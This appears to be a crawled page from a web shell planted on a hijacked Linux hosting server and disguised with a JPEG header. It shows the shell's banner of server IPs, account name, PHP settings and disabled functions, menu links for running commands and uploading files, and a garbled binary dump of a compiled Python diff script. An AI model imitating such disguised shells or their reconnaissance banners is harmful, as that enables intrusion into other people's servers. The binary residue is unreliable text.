����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.145.115.172 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/../lib64/gio/../python3.8/../nss/../python2.7/Tools/scripts/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
� �fc @ se d Z d d l Z d d l Z d d l Z d d l Z d d l Z d � Z e d k ra e � n d S( sS Command line interface to difflib.py providing diffs in four formats: * ndiff: lists every line and highlights interline changes. * context: highlights clusters of changes in a before/after format. * unified: highlights clusters of changes in an inline format. * html: generates side by side comparison with change highlights. i����Nc C se d } t j | � } | j d d d d t d d �| j d d d d t d d �| j d d d d t d d �| j d d d d t d d �| j d d d d d d d d �| j � \ } } t | � d k r� | j � t j d � n t | � d k r| j d � n | j } | \ } } t j t j | � j � } t j t j | � j � } t | d � � } | j � } Wd QXt | d � � } | j � } Wd QX| j r�t j | | | | | | d | �} n{ | j r�t j | | � } n] | j r-t j � j | | | | d | j d | �} n$ t j | | | | | | d | �} t j j | � d S( Ns&